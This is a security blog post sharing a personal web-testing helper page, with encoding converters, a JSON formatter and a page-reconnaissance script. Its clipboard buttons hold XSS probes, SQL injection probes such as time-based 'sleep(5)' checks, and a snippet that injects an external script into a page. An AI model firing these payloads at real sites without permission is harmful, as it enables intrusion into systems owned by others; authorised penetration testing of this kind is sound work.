guimaizi’s blog

从前


title: 一个辅助小工具 url: 394.html id: 394 comments: false categories:

  • 安全/代码 date: 2019-01-20 21:17:59 tags:

tool.html

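<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<title>Tool</title>
<style>
body{ margin:0 auto; width:600px; height:100px}
#log{width:600px}
#text{width:600px}
</style>
<!-- NOTE(review): jQuery is fetched from a third-party CDN without Subresource
     Integrity. Either self-host it, or add integrity="sha384-<HASH_OF_THIS_FILE>"
     and crossorigin="anonymous" so the browser rejects a tampered copy. -->
<script src='https://code.jquery.com/jquery-3.3.1.js'></script>
<script src='/script/tool.js'></script>
<script>
// Wires each converter button to its function from /script/tool.js.
// Input is read from #text and the result is written to #log with .val(),
// so decoded markup is displayed as text and is never parsed as HTML.
$(document).ready(function(){
  // Button id -> conversion applied to the text in #text.
  // Wrappers resolve the tool.js names at click time, as the original handlers did.
  var converters = {
    decodeURI:      function(s){ return decodeURIComponent(s); },
    encodeURI:      function(s){ return encodeURIComponent(s); },
    Base64_encode:  function(s){ return Base64.encode(s); },
    Base64_decode:  function(s){ return Base64.decode(s); },
    decToHex:       function(s){ return decToHex(s); },
    hexToDec:       function(s){ return hexToDec(s); },
    stringToHex16:  function(s){ return stringtoHex(s); },
    hexToString16:  function(s){ return hextoString(s); },
    stringToEntity: function(s){ return stringToEntity(s); },
    entityToString: function(s){ return entityToString(s); },
    json_format:    function(s){ return formatJson(s); }
  };

  Object.keys(converters).forEach(function(id){
    $("#" + id).click(function(){
      // Local variable: the original handlers assigned an undeclared `str`,
      // which leaked a global and fails under strict mode.
      var input = $("#text").val();
      try {
        $("#log").val(converters[id](input));
      } catch (e) {
        // e.g. decodeURIComponent throws URIError on a malformed % sequence;
        // show the reason instead of failing silently in the console.
        $("#log").val("Error: " + e.message);
      }
    });
  });

  // NOTE(review): the visible label says an 8-character key, but this call
  // asks for 12 characters and then appends '_' - confirm which is intended.
  $("#random_key").click(function(){
    $("#log").val(randomWord(false, 12)+'_');
  });

  // Copy the output back into the input box so conversions can be chained.
  $("#click_up").click(function(){
    $("#text").val($("#log").val());
  });
});
</script>
</head>
<body><div class="div">
Tool
</div>
<div>
<textarea id="text" rows="20" cols="60">
</textarea>
</div>
<div class="button">
<table cellpadding="5">
  <tr>
    <th><button id="encodeURI">encodeURI</button></th>
    <th><button id="Base64_encode">Base64_encode</button></th>
    <th><button id="decToHex">jsdecToHex</button></th>
    <th><button id="stringToHex16">stringToHex16</button></th>
    <th><button id="stringToEntity">stringToEntity</button></th>
  </tr>
  <tr>
    <th><button id="decodeURI">decodeURI</button></th>
    <th><button id="Base64_decode">Base64_decode</button></th>
    <th><button id="hexToDec">jshexToDec</button></th>
    <th><button id="hexToString16">hexToString16</button></th>
    <th><button id="entityToString">entityToString</button></th>
  </tr>
</table>
生成随机8位数key:<button id="random_key">random_key</button><br>json格式化:<button id="json_format">json_format</button>
<br>
<!-- Clipboard buttons: every .btn copies its data-clipboard-text value when clicked.
     The first value is written as character references because it contains a
     double quote, which would otherwise end the attribute. -->
xss剪贴板:<br>
<button class="btn" data-clipboard-text="&#100;&#97;&#115;&#100;&#97;&#103;&#117;&#105;&#109;&#97;&#105;&#122;&#105;&#120;&#115;&#115;&#115;&#115;&#34;&#39;&#47;&#62;">
dasdaguimaizixssss"'/>
</button>
<button class="btn" data-clipboard-text="location">
location
</button>
<button class="btn" data-clipboard-text="javascript:alert(1)">
javascript:alert(1)
</button>
<button class="btn" data-clipboard-text="<img src=a onerror=alert()>">
&#x3c;&#x69;&#x6d;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3d;&#x61;&#x20;&#x6f;&#x6e;&#x65;&#x72;&#x72;&#x6f;&#x72;&#x3d;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x29;&#x3e;
</button>
<br>
sql剪贴板:<br>
<button class="btn" data-clipboard-text="and 1=1">
and 1=1
</button>
<button class="btn" data-clipboard-text="and sleep(5)-- ">
and sleep(5)--  
</button>
<button class="btn" data-clipboard-text="' |(select database());# ">
' |(select database());#
</button><br>
常用剪贴板:<br>
<button class="btn" data-clipboard-text="http://www.guimaizi.com/">
http://www.guimaizi.com/
</button>
<button class="btn" data-clipboard-text="var script = document.createElement('script');
script.setAttribute('src','http://127.0.0.1/vul.js');
document.body.appendChild(script);">
inj js
</button>
</div>
<br><hr>
<button id="click_up">get_up</button><br>
<textarea id="log" rows="20" cols="60">
</textarea>
<!-- NOTE(review): the package@version part of this URL appears to have been
     rewritten to "[email protected]" by an e-mail obfuscation filter when the
     post was published, so it will not resolve as written. Restore it as
     clipboard@<PINNED_VERSION>, and pin it with Subresource Integrity or
     self-host it, as for jQuery above. -->
<script src="https://unpkg.com/[email protected]/dist/clipboard.min.js"></script>
<script>
// Bind clipboard.js to every .btn element.
var clipboard = new ClipboardJS('.btn');

clipboard.on('success', function(e) {
    // Clear the selection left behind by the copy operation.
    e.clearSelection();
});

clipboard.on('error', function(e) {
    console.error('Action:', e.action);
    console.error('Trigger:', e.trigger);
});
</script>
</body>
</html>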

tool.js

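// Base64 encoder/decoder for JavaScript strings.
// Text is converted to UTF-8 bytes before encoding and converted back after
// decoding, so non-ASCII input round-trips.
var Base64 = {

    // private property: the 64 alphabet characters, then "=" at index 64 for padding
    _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",

    // public method for encoding
    // input: a JavaScript string. Returns padded Base64 text.
    // Note that "\r\n" is normalised to "\n" first (see _utf8_encode), so the
    // encoded bytes differ from the input when it contains CRLF line endings.
    encode: function(input) {
        var output = "";
        var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
        var i = 0;

        input = Base64._utf8_encode(input);

        while (i < input.length) {

            // charCodeAt past the end of the string yields NaN; that marks
            // the missing bytes of the final group.
            chr1 = input.charCodeAt(i++);
            chr2 = input.charCodeAt(i++);
            chr3 = input.charCodeAt(i++);

            enc1 = chr1 >> 2;
            enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
            enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
            enc4 = chr3 & 63;

            // Index 64 is "=", emitted for bytes that were not present.
            if (isNaN(chr2)) {
                enc3 = enc4 = 64;
            } else if (isNaN(chr3)) {
                enc4 = 64;
            }

            output = output + this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) + this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);

        }

        return output;
    },

    // public method for decoding
    // input: Base64 text. Characters outside the alphabet (whitespace, URL-safe
    // "-" and "_", anything else) are silently removed before decoding.
    decode: function(input) {
        var output = "";
        var chr1, chr2, chr3;
        var enc1, enc2, enc3, enc4;
        var i = 0;

        input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");

        while (i < input.length) {

            enc1 = this._keyStr.indexOf(input.charAt(i++));
            enc2 = this._keyStr.indexOf(input.charAt(i++));
            enc3 = this._keyStr.indexOf(input.charAt(i++));
            enc4 = this._keyStr.indexOf(input.charAt(i++));

            chr1 = (enc1 << 2) | (enc2 >> 4);
            chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
            chr3 = ((enc3 & 3) << 6) | enc4;

            output = output + String.fromCharCode(chr1);

            // 64 is the padding marker: the byte it stands for does not exist.
            if (enc3 != 64) {
                output = output + String.fromCharCode(chr2);
            }
            if (enc4 != 64) {
                output = output + String.fromCharCode(chr3);
            }

        }

        output = Base64._utf8_decode(output);

        return output;

    },

    // private method for UTF-8 encoding
    // Returns a string in which every character holds one UTF-8 byte (0-255).
    _utf8_encode: function(string) {
        string = string.replace(/\r\n/g, "\n");
        var utftext = "";

        for (var n = 0; n < string.length; n++) {

            // codePointAt joins a surrogate pair into a single code point, so
            // characters above U+FFFF become one 4-byte sequence instead of
            // two 3-byte surrogate encodings that other decoders reject.
            var c = string.codePointAt(n);
            if (c > 0xFFFF) {
                n++; // the low surrogate has been consumed already
            }

            if (c < 128) {
                utftext += String.fromCharCode(c);
            } else if (c < 2048) {
                utftext += String.fromCharCode((c >> 6) | 192);
                utftext += String.fromCharCode((c & 63) | 128);
            } else if (c < 65536) {
                utftext += String.fromCharCode((c >> 12) | 224);
                utftext += String.fromCharCode(((c >> 6) & 63) | 128);
                utftext += String.fromCharCode((c & 63) | 128);
            } else {
                utftext += String.fromCharCode((c >> 18) | 240);
                utftext += String.fromCharCode(((c >> 12) & 63) | 128);
                utftext += String.fromCharCode(((c >> 6) & 63) | 128);
                utftext += String.fromCharCode((c & 63) | 128);
            }

        }

        return utftext;
    },

    // private method for UTF-8 decoding
    // The sequence length is chosen from the lead byte only; continuation bytes
    // are not validated, so malformed input decodes to some character instead
    // of raising an error.
    _utf8_decode: function(utftext) {
        var string = "";
        var i = 0;
        // Declared individually: the original `var c = c1 = c2 = 0` created
        // implicit globals, and c3 was never declared at all.
        var c = 0, c2 = 0, c3 = 0, c4 = 0;

        while (i < utftext.length) {

            c = utftext.charCodeAt(i);

            if (c < 128) {
                string += String.fromCharCode(c);
                i++;
            } else if ((c > 191) && (c < 224)) {
                c2 = utftext.charCodeAt(i + 1);
                string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
                i += 2;
            } else if ((c > 239) && (c < 248)) {
                // 4-byte sequence: a code point above U+FFFF
                c2 = utftext.charCodeAt(i + 1);
                c3 = utftext.charCodeAt(i + 2);
                c4 = utftext.charCodeAt(i + 3);
                var cp = ((c & 7) << 18) | ((c2 & 63) << 12) | ((c3 & 63) << 6) | (c4 & 63);
                // fromCodePoint throws above U+10FFFF; substitute U+FFFD instead
                string += cp > 0x10FFFF ? "\uFFFD" : String.fromCodePoint(cp);
                i += 4;
            } else {
                c2 = utftext.charCodeAt(i + 1);
                c3 = utftext.charCodeAt(i + 2);
                string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
                i += 3;
            }

        }

        return string;
    }

};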
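/**
 * Build a random string from the characters 0-9, a-z, A-Z and "_".
 *
 * @param {boolean} randomFlag when true the length is drawn from [min, max];
 *                             otherwise the length is exactly min.
 * @param {number} min         fixed length, or the lower bound when randomFlag is true.
 * @param {number} [max]       upper bound, only read when randomFlag is true.
 * @returns {string} the generated string.
 *
 * Uses Math.random(), which is not a cryptographically secure generator: the
 * result is suitable as a throw-away marker string, not as a secret, token or
 * password.
 */
function randomWord(randomFlag, min, max){
    var alphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_",
        str = "",
        range = min,
        pos; // declared here; the original assigned an undeclared global

    if(randomFlag){
        // floor over (max-min+1) gives every length the same chance;
        // Math.round halved the odds of the two end values.
        range = Math.floor(Math.random() * (max - min + 1)) + min;
    }
    for(var i=0; i<range; i++){
        // same reasoning: floor over the full length is uniform
        pos = Math.floor(Math.random() * alphabet.length);
        str += alphabet.charAt(pos);
    }
    return str;
}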
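// Convert a string to JavaScript \uXXXX escapes, one per UTF-16 code unit.
// Returns "" for an empty string.
var decToHex = function(str) {
  var res=[];
  for(var i=0;i < str.length;i++)
    // Pad with four zeros: with only two, code units below 0x10 (tab, newline)
    // came out as three digits and the escape was invalid.
    res[i]=("0000"+str.charCodeAt(i).toString(16)).slice(-4);
  return res.length ? "\\u"+res.join("\\u") : "";
}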
// Decode \uXXXX / \XX escapes (and their %uXXXX / %XX forms) back to characters.
// Every backslash is first turned into "%"; a "%" that is not followed by a
// valid escape is left in the output as a literal "%".
var hexToDec = function(str) {
  var percentForm = str.split("\\").join("%");
  return percentForm.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, function(whole, wide, narrow) {
    return String.fromCharCode(parseInt(wide || narrow, 16));
  });
}

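// Hex-encode a string, one UTF-16 code unit after another, with no separator.
// Code units up to 0xFF give two digits. Larger ones give four, which
// hextoString (it reads two digits at a time) will not turn back into the
// same character.
var stringtoHex=function (str) {
    var val = "";
    for (var i = 0; i < str.length; i++) {
      var hex = str.charCodeAt(i).toString(16);
      // Keep an even digit count per unit: without the pad, characters below
      // 0x10 (tab, newline) produced one digit and shifted every later byte.
      val += (hex.length % 2 ? "0" : "") + hex;
    }
    return val
}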
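// Decode a run of hex digit pairs into characters, one character per pair.
// Whitespace and a leading "0x" are ignored. A pair that is not valid hex
// decodes to U+0000, and a dangling final digit is read as a one-digit value.
var hextoString=function (hex) {
    // Before this normalisation a "0x" prefix or a space misaligned the pairs
    // and every misread pair became a NUL character.
    var digits = hex.replace(/\s+/g, "").replace(/^0x/i, "")
    var out = ""
    for (var i = 0; i < digits.length; i += 2) {
      // Number("0x..") is NaN for non-hex text; fromCharCode(NaN) is U+0000
      out += String.fromCharCode(Number("0x" + digits.slice(i, i + 2)))
    }
    return out
  }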
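// Convert every character of str to an HTML numeric character reference.
// radix: falsy (default) gives decimal references (&#60;), truthy gives
// hexadecimal ones (&#x3c;). The input and the result are logged to the console.
var stringToEntity=function(str,radix){
  radix=radix||0
  // Array.from iterates by code point, so a character above U+FFFF becomes one
  // reference; split('') produced two surrogate references, which HTML parsers
  // replace with U+FFFD.
  let tmp=Array.from(str).map(ch=>{
    const cp=ch.codePointAt(0)
    return `&#${radix?'x'+cp.toString(16):cp};`
  }).join('')
  console.log(`'${str}' 转实体为 '${tmp}'`)
  return tmp
}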
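// Replace HTML numeric character references (&#60; &#x3c; &#X3C;) with the
// characters they name. Text that is not a reference is kept as it is, and a
// reference without its closing ";" is left undecoded. The input and the
// result are logged to the console.
var entityToString=function(entity){
  let tmp=entity.replace(/&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));/g,(whole,hex,dec)=>{
    const cp=hex!==undefined?parseInt(hex,16):parseInt(dec,10)
    // fromCodePoint handles values above U+FFFF (fromCharCode truncated them)
    // but throws beyond U+10FFFF, so such a reference is left unchanged
    return cp>0x10FFFF?whole:String.fromCodePoint(cp)
  })
  console.log(`'${entity}' 转字符串为 '${tmp}'`)
  return tmp
}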

// Pretty-printer for JSON-like text, written in plain JavaScript; it can be
// used as it is.
// NOTE(review): the line breaks are inserted by regular expressions that do
// not know about string literals, so a brace, bracket or comma inside a quoted
// value is split as well. The text is never parsed, so invalid JSON is
// re-indented without any error.
var formatJson = function (json) {
        var PADDING = '    ',   // one indent level: four spaces
            depth = 0,          // indent level applied to the current line
            formatted = '';     // the result being assembled

        // Anything that is not already a string is serialised first.
        if (typeof json !== 'string') {
            json = JSON.stringify(json);
        }

        // Put each brace and bracket on a line of its own, break after each
        // comma, collapse the doubled line breaks this creates, and pull a
        // comma that ended up at the start of a line back onto the line before.
        var broken = json.replace(/([\{\}])/g, '\r\n$1\r\n')
                    .replace(/([\[\]])/g, '\r\n$1\r\n')
                    .replace(/(\,)/g, '$1\r\n')
                    .replace(/(\r\n\r\n)/g, '\r\n')
                    .replace(/\r\n\,/g, ',');

        // Walk the lines and decide for each one whether the depth changes.
        var nodes = broken.split('\r\n');
        for (var index = 0; index < nodes.length; index++) {
            var node = nodes[index];
            var indent = 0;
            if (/\{$/.test(node) || /\[$/.test(node)) {
                // an opener indents the lines that follow it
                indent = 1;
            } else if ((/\}/.test(node) || /\]/.test(node)) && depth !== 0) {
                // a closer is printed one level shallower; never below zero
                depth--;
            }
            formatted += PADDING.repeat(depth) + node + '\r\n';
            depth += indent;
            console.log('index:'+index+',indent:'+indent+',padIdx:'+depth+',node-->'+node);
        }
        return formatted;
};

vul.js

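// Prints an inventory of the current page to the console: link targets with
// their text, iframe sources, and every form with its fields.
// It runs as soon as the script is evaluated. The original was written as
// `window.onload = function(){...}()`, which also ran immediately but then
// assigned the function's return value (undefined) to window.onload, removing
// any onload handler the page had set.
(function (){
    // Return the values of arr without repeats, in first-seen order.
    function removeDuplicatedItem(arr) {
      var hash=[];
      for (var i = 0; i < arr.length; i++) {
         if(hash.indexOf(arr[i])==-1){
          hash.push(arr[i]);
         }
      }
      return hash;
    }
    /*** a href ***/
    var urls    =   [];
    var atags   =   document.getElementsByTagName("a");
    for(var i=0;i<atags.length;i++){
        var href    =   atags[i].getAttribute("href");
        if  (href){
            // push, not urls[i] = ...: indexing left holes for anchors
            // without an href, which showed up as `undefined` in the list
            urls.push(href+' --- '+atags[i].innerText);
        }
    }
    console.log(removeDuplicatedItem(urls));
    /*** iframe src ***/
    var iframe_src  =   [];
    var frames  =   document.getElementsByTagName("iframe");
    for(var k=0;k<frames.length;k++){
        var src =   frames[k].getAttribute("src");
        if  (src){
            iframe_src.push(src);
        }
    }
    console.log(removeDuplicatedItem(iframe_src));
    /*** forms ***/
    // NOTE(review): form.method, form.action and form.length are shadowed when
    // the form contains a control named "method", "action" or "length", so the
    // values printed here can be the control itself; check the markup when the
    // output looks odd.
    for(var f=0;f<document.forms.length;f++){
        // declared locally; the original assigned undeclared globals
        var form    =   document.forms[f];
        console.log(form.method,    form.action)
        for(var j=0;j<form.length;j++){
            var input   =   form[j];
            console.log(input.nodeName, input.type, input.name);
        }
    }
})();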